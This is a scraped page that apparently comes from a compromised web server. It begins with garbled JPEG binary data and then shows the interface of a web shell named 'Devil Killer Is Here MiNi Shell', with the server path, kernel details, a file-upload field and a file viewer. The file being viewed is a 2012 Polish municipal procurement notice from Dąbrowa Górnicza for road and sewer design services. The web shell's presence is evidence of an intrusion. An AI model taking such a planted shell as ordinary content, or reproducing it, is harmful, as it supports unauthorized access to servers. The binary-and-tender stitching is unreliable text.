JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120210/40696-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Wykonanie projektu budowlanego i wykonawczego dla zadania inwestycyjnego Zagospodarowanie terenu w rejonie osiedla Mickiewicza i Norwida w Dąbrowie Górniczej w tym: Etap I ul. Majakowskiego</b><br>
<b>Numer ogłoszenia: 40696 - 2012; data zamieszczenia: 10.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektu budowlanego i wykonawczego dla zadania inwestycyjnego Zagospodarowanie terenu w rejonie osiedla Mickiewicza i Norwida w Dąbrowie Górniczej w tym: Etap I ul. Majakowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem umowy jest opracowanie projektu budowlanego i wykonawczego zgodnie z wymogami specyfikacji istotnych  warunków zamówienia i postanowieniami niniejszej  umowy.
Zamawiający dysponuje opracowaniami zawierającymi:
Koncepcję zagospodarowania terenu w rejonie osiedla Mickiewicza i Norwida w Dąbrowie Górniczej w branżach:
- architektoniczna,
- wodno-kanalizacyjna,
- drogowa,
- elektryczna,
- energetyczna (zał. nr 9 do SIWZ).
Wykonawca, który zostanie wybrany w drodze przetargu otrzyma po 1 egz. opracowań, celem służbowego wykorzystania.
Zakres prac projektowych zgodnie z załączoną mapą zał. nr 2 b do siwz oraz tabelą - załącznik nr 2 do siwz 

I. Prace przygotowawcze:
1.  opracowanie map do celów projektowych wraz z inwentaryzacją stanu istniejącego,
2.  sporządzenie wypisu z ewidencji gruntów wraz z mapą ewidencyjną,
3. uzyskanie w imieniu Zamawiającego:
a) Warunków zabudowy i zagospodarowania dla terenu nie objętego planem miejscowym,
b) Decyzji o środowiskowych uwarunkowaniach planowanego przedsięwzięcia na środowisko, zgodnie z ustawą z dnia 27.04.2001 roku Prawo ochrony środowiska, tekst jedn. z dnia 23 stycznia 2008 r.( Dz. U. Nr 25, poz.150),
c) opracowanie operatów wodno - prawnych wraz z uzyskaniem decyzji na odprowadzenie wód deszczowych,
d) pozyskanie zgody właścicieli nieruchomości na wejście w teren celem wykonania robót budowlanych wraz z dokumentacją terenowo-prawną,     
e) złożenia kompletnego wniosku do uzyskania w imieniu Zamawiającego decyzji administracyjnej  pozwolenia na budowę, 
4. wyliczenie ilości ścieków sanitarnych i wód deszczowych w oparciu o aktualny i przewidywany stan zlewni terenu ciążącego do skrzyżowania ul. Majakowskiego z ul. Piłsudskiego,
5. przekopy kontrolne i przekładki istniejącego uzbrojenia kolidującego z planowaną inwestycją,
6. zakup map wraz z uzyskaniem uzgodnień branżowych, uzyskanie warunków technicznych dla projektowanych obiektów,  wymaganych do uzyskania decyzji o pozwolenie na budowę,
7. uzyskanie pozytywnej opinii ZUD,
8.przeprowadzenie wszelkich procedur formalno-prawnych, uzyskanie uzgodnień, zezwoleń wymaganych do uzyskania decyzji o pozwolenie na budowę w imieniu Zamawiającego, 
9. inwentaryzacja zieleni. Przygotowanie kompletu dokumentów umożliwiających uzyskanie decyzji administracyjnej na wycinkę drzew przez Zamawiającego,
10.opracowanie badań geotechnicznych, hydrogeologicznych i geologiczno inżynierskich w terenie na potrzeby projektowanych obiektów  i sieci  wraz z uzyskaniem zezwoleń i decyzji, 
11.Wizualizacja w wersji elektronicznej,
12 .Plansza graficzna o wymiarach 1m x 2 m - 4 szt.

II. Prace projektowe:
W cenach poz. od 1 do 28 należy uwzględnić koszt przenośnego urządzenia do odtwarzania i nanoszenia zmian z ekranem min. 17 cali.
Dokumentacja projektowa ma uwzględniać parametry techniczne dla skanalizowania pozostałego rejonu tj. osiedla Mickiewicza i Norwida w Dąbrowie G., z przyległymi ulicami (w tym ul. Wyspiańskiego) oraz osiedlami: Staszic, Leśna, Tysiąclecia, Kasprzaka i innymi zgodnie z załączoną mapą.
Jednostka projektowa poda parametry brzegowe dla materiałów równoważnych.
Opracowanie projektów budowlanych i wykonawczych zgodnie z wymaganiami określonymi 
w decyzjach i Rozrządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 3 lipca 2003 roku (Dz.U. Nr 120, poz.1133), z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U nr 43; poz.430 z 1999 roku),Ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jedn. (Dz.U. Nr 156, poz.1118 z 2006r. z późn.zm), Ustawą z dnia 21 marca 1985r.Ustawa o drogach publicznych (Dz.U. Nr 19 poz. 115 z 2007r. z późn.zm) oraz innymi obowiązującymi ustawami, rozporządzeniami, normami.
Projekty i dokumenty muszą być zgodne z dyrektywami Unii Europejskiej w  zakresie oddziaływania przedsięwzięcia na środowisko. W przypadku stwierdzenia niezgodności z normami prawa europejskiego Jednostka projektowa zobowiązuje się do naniesienia poprawek lub dodatkowych opracowań w ramach wynagrodzenia ofertowego.
Projekty należy wykonać w zakresie uwzględniającym specyfikę robót oraz dokonać uzgodnień projektu z właściwymi zarządcami, właścicielami sieci , urządzeń, w tym z zarządcą dróg Wydziałem Komunikacji i Drogownictwa.
1) Budowa kanalizacji sanitarnej wraz z przebudową  przyłączy, w tym rysunki szczegółowe konstrukcyjne 
w miejscach przejść. Należy wykonać przełączenia wszystkich istniejących sieci, uwzględniając konieczny demontaż istniejącego uzbrojenia w niezbędnym zakresie. Przyłącza wyprowadzić poza pas drogowy 
i zakończyć studniami (wg Wariantu II koncepcji  branża wodno-kanalizacyjna). Uwzględnić potrzebę zamulenia bądź demontażu starych kanałów.

2)Budowa kanalizacji deszczowej wraz z przebudową przyłączy wraz z odwodnieniem dróg. Należy wykonać przełączenia wszystkich istniejących sieci, uwzględniając konieczny demontaż istniejącego uzbrojenia w niezbędnym zakresie.
Dodatkowo należy uwzględnić przelew awaryjny ciążący do zbiornika retencyjnego. Przyłącza wyprowadzić poza pas drogowy i zakończyć studniami (wg Wariantu II koncepcji branża wodno-kanalizacyjna). W zakresie projektowanej kanalizacji deszczowej należy uwzględnić odwodnienie dróg. Uwzględnić potrzebę zamulenia bądź demontażu starych kanałów.
3) Wymiana głównego kolektora kanalizacji deszczowej,
4) Budowa zbiornika retencyjnego wraz z technologią, zakresem budowlanym i innym niezbędnym do prawidłowego działania zbiornika,   
5) Przekładki ewentualnego istniejącego uzbrojenia kolidującego z planowaną inwestycją,
6) Czyszczenie i monitoring kanalizacji deszczowej i sanitarnej z podaniem średnic ich spadków oraz oceną stanu technicznego, celem ewentualnego wykorzystania istniejącego uzbrojenia dla prowadzenia robót metodą wykopową.
7) Budowa sieci wodociągowej zasilającej wraz z przyłączami oraz magistralnej, w tym zasuwy hydranty zabezpieczone przed wypływem po złamaniu. Przyłączenia wyprowadzić poza pas drogowy 
ul. Majakowskiego i zakończyć zasuwami. Wykonać przełączenia istniejących sieci (wg Wariantu II koncepcji  branża wodno-kanalizacyjna). Rozwiązać problem odcinanych sieci wodociągowych.
8) Przebudowa sieci wodociągowej GPW w rejonie projektowanego ronda. Uzgodnień dokonać z właścicielem sieci.
9) Budową komory redukcyjno-pomiarowej 
 - część konstrukcyjno-budowlana
- część technologiczna
- część elektryczna
- projekt demontażu istniejącej komory redukcyjno-pomiarowej
  wraz z technologią i koniecznymi robotami budowlanymi
10) Odwodnienia wykopów i budowli,
11) Zabezpieczenia wykopów i budowli,
12)Przebudowa ulicy Majakowskiego wraz z infrastrukturą i budową ronda - według wariantu I koncepcji  branża drogowa
Należy również uwzględnić odbudowę nawierzchni jezdni, chodników po wykonaniu przełączeń sieci 
w przyległych ulicach
13)Przebudowa odcinka ulicy 11 Listopada od ul. Wyspiańskiego do ul. Mickiewicza -według wariantu I koncepcji branża drogowa.
Należy również uwzględnić odbudowę nawierzchni jezdni, chodników po wykonaniu przełączeń sieci 
w przyległych ulicach
14)Przebudowa odcinka ulicy Mickiewicza od ul. 11 Listopada do końca parkingu przy ul. Mickiewicza (ruch dwukierunkowy); 
15)Odcinek ul. Mickiewicza od ul. Majakowskiego wraz ze zbiornikiem retencyjnym - według wariantu I koncepcji  branża drogowa (skrzyżowanie ulic Przemysłowa - Mickiewicza wraz z drogą na działce 37/3)
16) Budowa parkingu dla samochodów osobowych do 3,5t na zbiorniku retencyjnym 
17) Budowa małej architektury
18) Projekt organizacji robót z podziałem na etapy.
19) Projekt organizacji ruchu na czas trwania robót w tym koszty mijanek, poszerzeń miejscowych oraz koszty ewentualnych objazdów komunikacji zbiorowej wraz z zatwierdzeniem go w organach zarządzających ruchem. 
20)Projekt organizacji ruchu docelowy wraz z zatwierdzeniem go w organach zarządzających ruchem 

21) Przebudowa istniejących kabli ŚN i nn własności TAURON Polska Energia SA 
22) Przebudowa istniejącej sieci teletechnicznej wraz z likwidacją elementów sieci napowietrznej
23) Wykonanie kanalizacji teletechnicznej dla światłowodów Internetu szerokopasmowego
24) Inwentaryzacja i wycena istniejącego oświetlenia ulicznego przez Rzeczoznawcę Majątkowego
25) Likwidacja  starego i zaprojektowanie nowego oświetlenia ulicznego oraz oświetlenia typu parkowego ciągu pieszego
26)Inwentaryzacja i wycena istniejącej sieci nn napowietrznej rozdzielczej wraz z przyłączami przez rzeczoznawcę Majątkowego
27)Likwidacja istniejącej sieci nn napowietrznej rozdzielczej z przyłączami oraz zaprojektowanie sieci nn kablowej rozdzielczej wraz z przyłączami

28)Podanie wymagań i parametrów materiałów równoważnych
29)Opracowanie przedmiarów robót i specyfikacji technicznych wykonania i odbioru robót  budowlanych zgodnie z Rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego z dnia  2 września 2004 roku (DZ.U. Nr 202; poz.2072, z póź. zm) (należy wykorzystać załącznik Nr 8 do siwz do obliczania mas ziemnych). Uwaga: przed opracowaniem  przedmiarów robót i STWOR Jednostka Projektowa  jest zobowiązana do pisemnego  uzgodnienia z Zamawiającym poziomu zagregowania robót objętych projektem. Przedmiary robót wykonać  poszczególnymi branżami. Należy również sporządzić zestawienie materiałów z podaniem przykładowych producentów i numerami katalogowymi.
30)opracowanie kosztorysów inwestorskich w 2 egz. zgodnie z wymogami Rozporządzenia Ministra Infrastruktury w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym z dnia 18 maja 2004 r. (Dz.U. Nr 130, poz. 1389) Kosztorysy inwestorskie  wycenić dla każdej ulicy oddzielnie jako osobny rozdział. Jednostkę Projektową obowiązuje  wymóg tajności i nie udostępniania nikomu poza Zamawiającym kosztorysów inwestorskich. 

31) Inne uzgodnienia wymagane do uzyskania pozwolenia na budowę
III. Pełnienie nadzoru autorskiego w trakcie realizacji inwestycji.
Dokumentacja winna spełniać następujące wymagania: 
a. powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć.
b. będzie służyć jako opis przedmiotu zamówienia do przetargu na roboty budowlane w oparciu o ustawę Pzp oraz do realizacji na jej podstawie pełnego zakresu robót budowlanych niezbędnego dla użytkowania obiektu zgodnie  z przeznaczeniem.
c. w swej treści powinna określać technologię robót, użyte materiały i zastosowane urządzenia 
w sposób umożliwiający zachowanie uczciwej konkurencji. Powinna określać parametry techniczne 
i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii i urządzeń.

Dokumentację projektową wraz ze specyfikacją techniczną wykonania i odbioru robót  oraz przedmiary robót należy sporządzić w 8 egz. w wersji  papierowej i  2 egz. w wersji elektronicznej (tylko do odczytu). Kosztorysy inwestorskie w 2 egz. w wersji papierowej i 1 egz. w wersji elektronicznej (tylko do odczytu).
Dokumentacja w formie elektronicznej winna być przekazana Zamawiającemu na płytach CD w formie plików w formacie xls, doc lub pdf zabezpieczonych przed zmianami i umożliwiających przesłanie dokumentacji drogą elektroniczną. 
Kosztorysy inwestorskie oraz przedmiary robót winny być przekazane na osobnych płytach CD lub dyskietkach, w formacie xls..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwości udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust.1 pkt. 6 Ustawy. Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym  przedmiotem zamówienia i określonym kodami CPV. 
Wartość szacunkowa zamówień uzupełniających nie przekroczy 10% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 10.000,00zł (słownie: dziesięć tysięcy 00/100 ) w formach określonych w art. 45 ust. 6 Ustawy.
 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego:
Getin Noble Bank S.A. - konto nr 74 1560 1010 0000 9480 0001 1847 
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym z 	uwzględnieniem art. 46 ust.4 Ustawy. Wskazane jest dołączenie do oferty kopii polecenia   	przelewu potwierdzonej przez Wykonawcę.
W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu należy złożyć w Wydziale Księgowo-Budżetowym Urzędu Miejskiego w Dąbrowie Górniczej ul. Graniczna pokój nr 320, III piętro. Wskazane jest dołączenie do oferty  kserokopii złożonego dokumentu.
Zwrot wadium - zgodnie z art. 46 ust. 1, 1a, 2 i 4  Ustawy.
Zatrzymanie wadium - zgodnie z art. 46 ust. 4a i 46 ust. 5 Ustawy.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 Ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Wykonawcy, którzy nie wniosą wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, którym mowa w art. 46 ust.3 Ustawy, albo nie zgodzili się na przedłużenie okresu związania ofertą zostaną wykluczeni z postępowania (art. 24 ust. 2 pkt. 2 Ustawy)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.: 
co najmniej 2 usługi polegające na opracowaniu dokumentacji projektowej w branżach jak w pkt. 3.3. SIWZ o łącznej wartości minimum 500.000PLN brutto, w tym jedna o wartości min. 350.000,00PLN brutto,  obejmujące: 
- przebudowę lub budowę dróg klasy co najmniej Z wraz z budową nowych rond na skrzyżowaniach ulic co najmniej klasy Z,
- budowę sieci kanalizacji sanitarnej i deszczowej w centrum miasta o średnicach minimalnych dla sieci kanalizacji deszczowej - DN 800, dla sieci kanalizacji sanitarnej DN200 i długości min. 800mb,
- budowę w ramach co najmniej jednej dokumentacji projektowej podziemnych zbiorników retencyjnych wód deszczowych o poj. min. V-1000m3
- budowę lub przebudowę wodociągu o średnicy min. DN250mm i długości min. 800mb
- budowę lub przebudowę sieci oświetlenia dróg,
- budowę lub przebudowę sieci teletechnicznych.
Uwaga: 
1.Jeżeli zakres usług przedstawionych w dokumencie złożonym na potwierdzenie, wykonania usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie podać wartość usług odpowiadających zakresowi przedmiotu zamówienia, przedstawianych na potwierdzenie warunku udziału w postępowaniu w zakresie doświadczenia.
2.Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.  
3. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów, przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów  w wykonaniu zamówienia.
Ocena spełniania warunku udziału w postępowaniu będzie dokonana w oparciu o
złożony wraz z ofertą wykaz usług w zakresie niezbędnym do wykazania spełniania
warunku wiedzy i doświadczenia oraz załączonych dokumentów (np. referencji)
potwierdzających, że usługi te zostały wykonane należycie wg formuły : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 ustawy i jego weryfikacja zostanie przeprowadzona wg formuły spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje:
a) osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci i urządzeń wodociągowych i kanalizacyjnych (zgodnie z rozporządzeniem Ministra Transportu 
i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane - minimum 1 osoba,   
b) osobą posiadającą uprawnienia budowlane do projektowania w specjalności drogowej (zgodnie 
z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane - minimum 1 osoba. 
c) osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (zgodnie z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych 
w budownictwie Dz. U. Nr 83, poz. 578 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane - minimum 1 osoba. 
Ocena spełniania warunku udziału w postępowaniu będzie dokonana w oparciu o złożony wraz z ofertą wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczeniem, że osoby, które będą
uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wg formuły: spełnia
- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000,00.zł.
Ocena spełniania warunku
udziału w postępowaniu będzie dokonana w oparciu o złożoną wraz z ofertą opłaconą polisę, a w
przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od
odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem
zamówienia wg formuły: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

